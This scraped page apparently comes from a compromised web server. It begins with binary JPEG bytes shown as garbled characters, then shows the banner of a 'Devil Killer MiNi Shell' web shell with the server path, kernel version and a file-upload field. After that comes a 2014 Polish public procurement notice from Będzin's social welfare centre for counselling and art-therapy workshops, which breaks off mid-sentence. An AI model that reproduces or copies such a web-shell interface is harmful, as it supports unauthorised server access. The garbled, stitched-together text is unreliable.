JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140523/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140523/175284-N-2014.html

<p class="kh_header"><b>Będzin: Zorganizowanie i przeprowadzenie poradnictwa psychologiczno - terapeutycznego 
oraz doradztwa zawodowego wraz z warsztatami arteterapii dla 70 uczestników projektu systemowego Legalniezmotywowani.pl</b><br>
<b>Numer ogłoszenia: 175284 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 11 Listopada 1, 42-500 Będzin, woj. śląskie, tel. 032 2674982; 7614760, 61, faks 032 2674982, 7614760, 7614761.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ----------</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie poradnictwa psychologiczno - terapeutycznego 
oraz doradztwa zawodowego wraz z warsztatami arteterapii dla 70 uczestników projektu systemowego Legalniezmotywowani.pl.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie poradnictwa psychologiczno - terapeutycznego oraz doradztwa zawodowego 
wraz z warsztatami arteterapii dla 70 uczestników projektu systemowego Legalniezmotywowani.pl, w tym:
1)	diagnoza potrzeb psychologicznych uczestników projektu i ich rodzin oraz udzielenie wsparcia psychologicznego uczestnikom projektu;
2)	diagnoza predyspozycji zawodowych uczestników projektu pod kątem wyboru określonego kierunku szkolenia zawodowego, zdiagnozowanie indywidualnych problemów uczestników projektu, praca nad ich słabościami, a także przygotowanie uczestników projektu do samodzielności i wyjścia na rynek pracy.
2.	Uczestnikami usługi, o której mowa w ust. 1 niniejszego punktu ogłoszenia będą wskazani przez Zamawiającego uczestnicy projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Będzinie. Projekt jest współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego.
3.	Szczegółowy zakres przedmiotu niniejszego zamówienia obejmuje następujące cztery moduły:
1)	Moduł 1 - grupowe wsparcie psychologiczno - terapeutyczne - warsztaty dla 7 grup średnio po 10 osób w grupie, w wymiarze po 14 godzin dla każdej z grup,  
z zastrzeżeniem, że jedna godzina warsztatów winna obejmować 60 minut, przy czym wymaga się, aby 80 % czasu trwania warsztatów zostało przeprowadzonych 
za pomocą aktywnych metod pracy z grupą. Warsztaty winny obejmować co najmniej następujące zagadnienia:
a)	przełamywanie barier psychologicznych występujących u osób nieaktywnych zawodowo;
b)	przełamywanie barier niskiej samooceny i niskiej motywacji;
c)	odkrywanie swoich mocnych stron, rozwijanie własnej osobowości 
i kreatywności;
d)	pozytywne myślenie;
e)	motywacja do aktywnej obecności na rynku pracy;
f)	asertywność;
g)	rozpoznawanie uczuć, wyrażanie uczuć, sposoby radzenia sobie z emocjami;
h)	określenie predyspozycji zawodowych - za pomocą badania psychologicznego.
2)	Moduł 2 - indywidualne wsparcie psychologiczne - w wymiarze 1 godziny obejmującej 60 minut dla każdego z uczestników projektu - łącznie 70 godzin indywidualnego wsparcia psychologicznego. Indywidualne wsparcie psychologiczne winno obejmować co najmniej następujące zagadnienia:
a)	wzmocnienie poczucia własnej wartości uczestników projektu;
b)	wykształcenie samoświadomości poprzez analizę mocnych i słabych stron;
c)	budowa obrazu samego siebie;
d)	zachęcanie do refleksji nad sytuacją osobistą i zawodową;
e)	analiza własnych zasobów i deficytów.
3)	Moduł 3 - indywidualne doradztwo zawodowe - w wymiarze 1 godziny to jest 60 minut dla każdego z uczestników projektu - łącznie 70 godzin indywidualnego doradztwa zawodowego. Indywidualne doradztwo zawodowe winno obejmować 
co najmniej następujące zagadnienia:
a)	wskazanie kierunków poszukiwań zatrudnienia odpowiadającego określonym predyspozycjom;
b)	wskazanie nowych, atrakcyjnych zawodów na rynku pracy, z uwzględnieniem zawodów deficytowych;
c)	dostosowanie zawodowe do warunków rynku pracy oraz świata pracy;
d)	budowanie swojej pozycji na rynku pracy;
e)	określenie własnych predyspozycji i zainteresowań zawodowych.
4)	Moduł 4 - warsztaty arteterapii - warsztaty dla 7 grup średnio po 10 osób w grupie, 
w wymiarze po 16 godzin dla każdej z grup (4 spotkania po 4 godziny, 
z zastrzeżeniem, że jedna godzina warsztatów winna obejmować 60 minut), 
przy czym wymaga się, aby 50 % czasu trwania warsztatów obejmowały zajęcia praktyczne. Warsztaty powinny obejmować co najmniej następujące zagadnienia:
a)	pobudzanie wszechstronnego rozwoju uczestników projektu;
b)	stwarzanie możliwości własnych wypowiedzi za pomocą różnorodnych środków artystycznych;
c)	podnoszenie poziomu samoakceptacji, zaufania oraz wzrost poczucia własnej wartości;
d)	odkrywanie i kształcenie umiejętności w zakresie aktywności zawodowej;
e)	budowanie motywacji do aktywności;
f)	rozwijanie praktycznych umiejętności i sprawności manualnych;
g)	kształcenie wyobraźni plastycznej i umiejętności warsztatowych;
h)	obniżanie napięć nerwowych, relaksowanie, wyciszenie;
i)	kształtowanie wrażliwości na potrzeby środowiska + wykorzystanie surowców wtórnych jako możliwości ochrony środowiska;
j)	wdrażanie do cierpliwości i staranności w pracy własnej i grupy;
k)	rozwijanie własnych działań twórczych.
Zakres przedmiotu niniejszego zamówienia może zostać poszerzony i uszczegółowiony przez Wykonawcę, mając na uwadze potrzeby uczestników projektu systemowego.
4.	Wykonawca zobowiązuje się do:
1)	wykonania przedmiotu niniejszego zamówienia z należytą starannością, zgodnie 
z najlepszymi praktykami przyjętymi przy świadczeniu tego rodzaju usług;
2)	ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku
z prowadzonymi zajęciami, warsztatami, treningami i doradztwem, składającymi 
się na wszystkie cztery moduły przedmiotu niniejszego zamówienia oraz w drodze 
do miejsca ich prowadzenia i z powrotem wszystkich uczestników zajęć, warsztatów, treningów i doradztwa, a także przestrzegania obowiązujących przepisów BHP
oraz poniesienia wszelkich niezbędnych kosztów związanych z realizacją zajęć, warsztatów, treningów i doradztwa, składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia, zgodnie z obowiązującymi przepisami, prawa, postanowieniami SIWZ oraz postanowieniami wzoru umowy w sprawie udzielenia niniejszego zamówienia;
3)	wydania uczestnikom grupowego wsparcia psychologiczno - terapeutycznego 
oraz warsztatów arteterapii odrębnych zaświadczeń / certyfikatów dotyczących uczestnictwa w grupowym wsparciu psychologiczno - terapeutycznym 
oraz uczestnictwa w warsztatach arteterapii, oznakowanych zgodnie z ust. 4 pkt 5 niniejszego punktu ogłoszenia, zawierających co najmniej:
a)	imię i nazwisko uczestnika,
b)	pełną nazwę formy wsparcia,
c)	nazwę organizatora formy wsparcia,
d)	czas trwania formy wsparcia,
e)	cel formy wsparcia,
f)	wykaz przedmiotów objętych formą wsparcia ze wskazaniem nazwy przedmiotu, 
wymiaru godzin zajęć teoretycznych i praktycznych poszczególnych przedmiotów 
oraz łącznego wymiaru godzin zajęć teoretycznych i praktycznych w ramach formy wsparcia,
g)	pieczęć i podpis organizatora formy wsparcia,
h)	datę wystawienia zaświadczenia / certyfikatu i numer zaświadczenia / certyfikatu.
Certyfikat zostanie wydrukowany przez Wykonawcę (biały papier, format A4, 
+/- 200g/m2, połyskujący, druk kolorowy);
4)	zapewnienia każdemu z uczestników grupowego wsparcie psychologiczno - terapeutycznego oraz warsztatów arteterapii nieodpłatnych materiałów edukacyjnych w formie papierowej, adekwatnych do tematyki prowadzonych zajęć, w skład których wchodzą w szczególności: materiały plastyczne, skrypty lub inne niezbędne pomoce naukowe, wzory dokumentów i formularzy z zakresu objętego tematem zajęć, 
a także materiały biurowe, w tym: notatnik (minimum format A5 60-kartkowy) 
i przybory do pisania, przekazywane każdemu uczestnikowi na własność. 
Materiały edukacyjne, materiały plastyczne i materiały biurowe powinny być przekazywane uczestnikom grupowego wsparcia psychologiczno - terapeutycznego oraz warsztatów arteterapii wraz z rozpoczęciem zajęć. Zamawiający dopuszcza możliwość przekazywania materiałów edukacyjnych i materiałów plastycznych 
na bieżąco zgodnie z realizowanym tematem zajęć. Materiały edukacyjne winny być oznakowane zgodnie z ust. 4 pkt 5 niniejszego punktu ogłoszenia. Materiały edukacyjne, materiały plastyczne  i materiały biurowe, które uczestnik otrzyma 
na własność muszą być nowe, nieużywanie, adekwatne do treści prowadzonych zajęć, zgodne z obowiązującym stanem prawnym oraz dobre jakościowo. Zastrzega się, 
że wszystkie materiały edukacyjne winny być zaakceptowane przez Zamawiającego przed rozpoczęciem realizacji danej formy wsparcia;
5)	oznakowania miejsc prowadzenia zajęć, warsztatów, treningów i doradztwa, składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia, poprzez zamieszczenie informacji o współfinansowaniu form wsparcia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Informacja ta winna zostać opatrzona logiem Unii Europejskiej, Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007 - 2013. Wykonawca zobowiązany jest analogicznie oznakować materiały edukacyjne oraz dokumenty potwierdzające ukończenie grupowego wsparcie psychologiczno - terapeutycznego oraz warsztatów arteterapii;
6)	niezwłocznego (najpóźniej w następnym dniu roboczym od daty zaistnienia zdarzenia) informowania na piśmie Zamawiającego o: 
a)	rezygnacji z uczestnictwa w zajęciach grupowych i indywidualnych składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia w trakcie 
ich trwania;
b)	nieobecności uczestników na zajęciach grupowych i indywidualnych składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia;
c)	innych okolicznościach mających wpływ na realizację przedmiotu niniejszego zamówienia;
7)	każdorazowego przekazania Zamawiającemu: listy obecności wraz z podpisami uczestników, listy potwierdzającej odbiór materiałów dydaktycznych, listy potwierdzającej odbiór poczęstunku / ciepłego posiłku, listy potwierdzającej zwrot kosztów przejazdu w przypadkach określonych w ust. 8 niniejszego punktu ogłoszenia,  zaświadczeń / certyfikatów potwierdzających uczestnictwo w grupowym wsparciu psychologiczno - terapeutycznym oraz uczestnictwo w warsztatach arteterapii, a także dzienników zajęć, w terminie 5 dni od dnia zakończenia realizacji przedmiotu niniejszego zamówienia;
8)	sporządzenia sprawozdania z realizacji każdego z zajęć grupowych i każdego z zajęć indywidualnych składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia i przekazania go Zamawiającemu w terminie 5 dni do dnia zakończenia realizacji przedmiotu niniejszego zamówienia;
9)	sporządzenia narzędzi do ewaluacji uczestników dotyczących wszystkich czterech modułów przedmiotu niniejszego zamówienia w postaci badań ankietowych przeprowadzonych przed rozpoczęciem i po rozpoczęciu realizacji przedmiotu niniejszego zamówienia, oceniających poziom osiągniętych rezultatów. Analiza osiągniętych wyników ankietowych zostanie przekazana Zamawiającemu w postaci raportu w terminie 5 dni od zakończenia realizacji przedmiotu niniejszego zamówienia;
10)	przedstawienia Zamawiającemu harmonogramu każdego z zajęć grupowych 
oraz każdego z zajęć indywidualnych składających na wszystkie cztery moduły przedmiotu niniejszego zamówienia wraz z programem tych zajęć w terminie 3 dni przed rozpoczęciem realizacji przedmiotu niniejszego zamówienia, zgodnie
z harmonogramem form wsparcia stanowiącym załącznik nr 1 do umowy w sprawie udzielenia niniejszego zamówienia (wzór umowy stanowi załącznik nr 7 do SIWZ);
11)	archiwizowania dokumentacji związanej z przeprowadzonym przedmiotem niniejszego zamówienia do roku 2020 oraz wskazania miejsca archiwizacji 
tej dokumentacji. Wymóg ten związany jest z zapisami umowy ramowej zawartej pomiędzy Zamawiającym, a Urzędem Marszałkowskim Województwa Śląskiego dotyczącej realizacji projektu w ramach Programu Operacyjnego Kapitał Ludzki;
12)	zachowania w tajemnicy danych osobowych uczestników projektu przez Wykonawcę 
oraz wszystkie osoby wykonujące przedmiot niniejszego zamówienia mające do nich dostęp, a także nieujawniania osobom trzecim żadnych informacji, jakie osoby 
te uzyskają podczas lub w związku z wykonywaniem usługi objętej przedmiotem niniejszego zamówienia dotyczących w szczególności sytuacji rodzinnej, materialnej 
i zdrowotnej, uzyskanych od uczestników projektu.
5.	Wykonawca zobowiązany jest do prowadzenia następującej dokumentacji dotyczącej przedmiotu niniejszego zamówienia:
1)	listy obecności na wszystkich zajęciach grupowych i indywidualnych składających się 
na cztery moduły przedmiotu niniejszego zamówienia, zawierające tytuł prowadzonych zajęć, datę prowadzenia zajęć, imię i nazwisko oraz podpis uczestnika zajęć;
2)	dzienniki zajęć zawierających wymiar godzin i tematy prowadzonych zajęć, 
listę uczestników zajęć oraz konspekt prowadzonych zajęć odnoszące się 
do grupowego wsparcie psychologiczno - terapeutycznego oraz warsztatów arteterapii;
3)	opinie / karty indywidualnych usług doradczych i psychologicznych;
4)	listy potwierdzające odbiór przez uczestników materiałów edukacyjnych zawierające imię i nazwisko, datę odbioru materiałów oraz podpis uczestnika zajęć;
5)	listy potwierdzające odbiór poczęstunku / ciepłego posiłku zwierające imię 
i nazwisko, datę odbioru oraz podpis uczestnika zajęć;
6)	listy potwierdzającej zwrot kosztów przejazdu w przypadkach określonych w ust. 8 niniejszego punktu ogłoszenia;
7)	zaświadczenia / certyfikaty potwierdzające uczestnictwo w grupowym wsparciu psychologiczno - terapeutycznym oraz uczestnictwo w warsztatach arteterapii.
6.	Zajęcia objęte przedmiotem niniejszego zamówienia powinny odbywać się we wszystkie dni robocze od poniedziałku do piątku z wyłączeniem świąt w przedziale czasowym
 od 8 00 do 16 00 w terminie wykonania niniejszego zamówienia określonym w Rozdziale III SIWZ. Niezależnie od powyższych norm, po uzyskaniu uprzedniej zgody Zamawiającego, Zamawiający dopuszcza możliwość realizacji przedmiotu niniejszego zamówienia w dni robocze po godzinie 16 00, nie później jednak niż do godziny 18 00, 
a także w soboty w przedziale czasowym od 8 00 do 14 00.
7.	Wykonawca realizować będzie przedmiot niniejszego zamówienia na obszarze działania Zamawiającego, to jest w granicach administracyjnych Gminy Będzin.
8.	Wykonawca winien pokryć koszty przejazdu uczestników do miejsca prowadzonych zajęć i z powrotem na wszystkie zajęcia grupowe i indywidualne składające się 
na przedmiot niniejszego zamówienia, w tym dzieciom do 7 roku życia. Przedmiotowe koszty obejmują koszty przejazdu i powrotu do miejsca i z miejsca prowadzenia zajęć, 
za przejazd środkami transportu zbiorowego na obszarze jednej gminy, w każdym dniu prowadzenia tych zajęć.
9.	Wykonawca winien zapewnić:
1)	ciepły posiłek, na który składać się będą: dania ciepłe (mięsne, rybne, warzywne), sałatki i soki wszystkim uczestnikom grupowego wsparcia psychologiczno - terapeutycznego, w każdym dniu prowadzenia tych zajęć,
2)	poczęstunek obejmujący zakąski zimne (kanapki) i soki wszystkim uczestnikom warsztatów arteterapii.
10.	Wykonawca winien zapewnić podczas wszystkich zajęć objętych przedmiotem niniejszego zamówienia opiekę łącznie nad 35 dziećmi do 7 roku życia (w tym - 
nad 2 dzieci w wieku 1 roku, 8 dziećmi w wieku 2 lat, 5 dziećmi w wieku 3 lat, 6 dziećmi w wieku 4 lat, 5 dziećmi w wieku 5 lat, 6 dziećmi w wieku 6 lat i 3 dziećmi 
w wieku 7 lat). Zamawiający zastrzega sobie prawo zmiany liczby dzieci do 7 roku życia wymagających opieki, w zależności od potrzeb. Wykonawca zobowiązany jest 
do przedstawienia wraz z ofertą opisu sposobu organizacji opieki nad dziećmi 
do 7 roku życia, w którym obligatoryjnie winien uwzględnić co najmniej:
1)	zapewnienie przez Wykonawcę ciepłego posiłku dzieciom do 7 roku życia 
w trakcie udziału ich rodziców, bądź prawnych opiekunów w zajęciach z zakresu grupowego wsparcia psychologiczno - terapeutycznego oraz poczęstunku obejmującego zakąski zimne (kanapki) i soki w trakcie udziału ich rodziców, bądź prawnych opiekunów w zajęciach z zakresu warsztatów arteterapii 
w każdym dniu prowadzenia tych zajęć, wskazując rodzaj tego posiłku,
2)	opisać sposób wykorzystania czasu wolnego,
3)	opisać kwalifikacje i doświadczenie zawodowe osób sprawujących przedmiotową opiekę.
11.	Wykonawca winien zapewnić podczas zajęć grupowych i indywidualnych składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia:
1)	dostęp do pomieszczeń sanitarnych w budynku, w którym odbywać się będą zajęcia (toaleta zlokalizowana w pobliżu sali, w której odbywać się będą zajęcia i umywalka wraz z dostępem do ciepłej wody),
2)	niezbędne narzędzia, materiały i pomoce dydaktyczne na czas trwania prowadzonych zajęć,
3)	dokładny rozkład zajęć odpowiadający harmonogramowi form wsparcia z podanymi tematami zgodnie z przedmiotem niniejszego zamówienia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia pierwszych zajęć.
12.	Zajęcia objęte przedmiotem niniejszego zamówienia zostaną przeprowadzone 
w pomieszczeniach z odpowiednim oświetleniem, ogrzewaniem i wentylacją, dostosowanych do prowadzenia zajęć, z zapewnionym zapleczem, posiadających odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne 
i jakościowe, których powierzchnia, ilość stanowisk oraz wyposażenie w narzędzia, materiały i pomoce dydaktyczne dostosowana jest do zakresu prowadzonych zajęć 
oraz liczby uczestników tych zajęć. W przypadku konieczności wykorzystania w trakcie realizacji przedmiotu niniejszego zamówienia narzędzi, urządzeń i sprzętu, w tym sprzętu umożliwiającego dokonywanie prezentacji multimedialnych oraz komputerowego 
z oprogramowaniem umożliwiającym edycję dokumentów tekstowych, graficznych 
i multimedialnych, a także gromadzenie i prezentację zasobów informacji potrzebnych przy świadczeniu usługi objętej przedmiotem niniejszego zamówienia, obowiązek 
ich zapewnienia spoczywa na Wykonawcy.
13.	Zamawiający zastrzega sobie prawo zmniejszenia liczby uczestników zajęć grupowych 
i indywidualnych składających się na wszystkie cztery moduły przedmiotu niniejszego zamówienia w trakcie realizacji umowy w sprawie udzielenia niniejszego zamówienia, 
o nie więcej niż 10 osób, w zależności od potrzeb wynikających ze zmiennej liczby osób kwalifikujących się do usług objętych przedmiotem niniejszego zamówienia.
W takim przypadku Wykonawcy będzie przysługiwać jedynie wynagrodzenie za liczbę osób fatycznie uczestniczących w zajęciach.
14.	Zamawiający nie pokrywa kosztów związanych z rezygnacją osób z udziału w projekcie, w takim przypadku Wykonawcy przysługiwać będzie jedynie wynagrodzenie 
za faktyczną liczbę godzin zrealizowanej usługi obliczone jako iloczyn oferowanej przez Wykonawcę ceny brutto za 1 godzinę usługi oraz faktycznej liczby godzin wykonanego zamówienia (zrealizowanej usługi). Za wykonanie usługi, o której mowa w niniejszym punkcie ogłoszenia Wykonawcy przysługiwać będzie wynagrodzenie obliczone proporcjonalnie do liczby godzin faktycznie zrealizowanej usługi, przy czym wynagrodzenie za jedną osobę objętą całą usługą składającą się na przedmiot niniejszego zamówienia nie może przekroczyć oferowanej przez Wykonawcę ceny za 1 godzinę zegarową wykonanej usługi oraz łącznej maksymalnej liczby godzin przypadających 
na jednego uczestnika określonej w ust. 3 niniejszego punktu ogłoszenia (to jest 32 godzin).
15.	Zamawiający zastrzega sobie, że autorskie prawa majątkowe do opracowanych przez Wykonawcę utworów przysługują Zamawiającemu.
16.	Każde ze spotkań w ramach modułu 1, modułu 2 i modułu 4 opisanego w ust. 3 pkt 1, 2 
i 4 niniejszego punktu ogłoszenia prowadzone będzie przez osobę posiadającą wykształcenie wyższe psychologiczne oraz spełniającą pozostałe warunki określone 
w Rozdziale IV ust. 2 pkt 3 tiret pierwsze SIWZ.
17.	Każde ze spotkań prowadzonych w ramach modułu 3 opisanego w ust. 3 pkt 3 niniejszego punktu ogłoszenia prowadzone będzie przez doradcę zawodowego, posiadającego wykształcenie wyższe i co najmniej roczny staż pracy w zakresie poradnictwa zawodowego oraz spełniającego pozostałe warunki określone w Rozdziale IV ust. 2 pkt 3 tiret drugie SIWZ.
18.	Wykonawca zapewni świadczenie usług objętych przedmiotem niniejszego zamówienia przez osoby, o których mowa w ust. 16 i 17 niniejszego punktu ogłoszenia, odpowiednio przeszkolone w zakresie narzędzi i metod wykorzystywanych w trakcie realizacji przedmiotu niniejszego zamówienia i/lub zagadnień składających się na realizację przedmiotu niniejszego zamówienia oraz umiejętność nawiązywania i utrzymywania kontaktów interpersonalnych.
19.	Wykonawca ponosi odpowiedzialność za staranność w wyborze osób, przy pomocy których będzie świadczył usługi objęte przedmiotem niniejszego zamówienia 
oraz prawidłowość wykonywanych przez nich czynności i obowiązków w powyższym zakresie.
20.	Wykonawca oraz osoby wykonujące przedmiot niniejszego zamówienia zobowiązują się prowadzić współpracę z pracownikami wyznaczonymi przez kierownika Zamawiającego. Przez przedmiotową współpracę rozumie się wymianę informacji dotyczącą uczestników projektu, korzystających ze wsparcia objętego przedmiotem niniejszego zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania uprawnień 
do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w przypadku gdy Wykonawca ten oświadczy, 
że posiada uprawnienia do wykonywania określonej działalności lub czynności, 
jeżeli przepisy prawa nakładają obowiązek ich posiadania, składając oświadczenie 
według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania wiedzy 
i doświadczenia, jeżeli ten wykaże, że w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 główną usługę obejmującą swoim rodzajem zarówno grupowe wsparcie psychologiczno - terapeutyczne, jak również indywidualne wsparcie psychologiczne, 
to jest 1 główną usługę obejmującą łącznie oba te zakresy w łącznym wymiarze nie mniejszym niż 500 godzin oraz co najmniej 1 główną usługę obejmującą swoim rodzajem indywidualne doradztwo zawodowe w łącznym wymiarze nie mniejszym niż 200 godzin 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi 
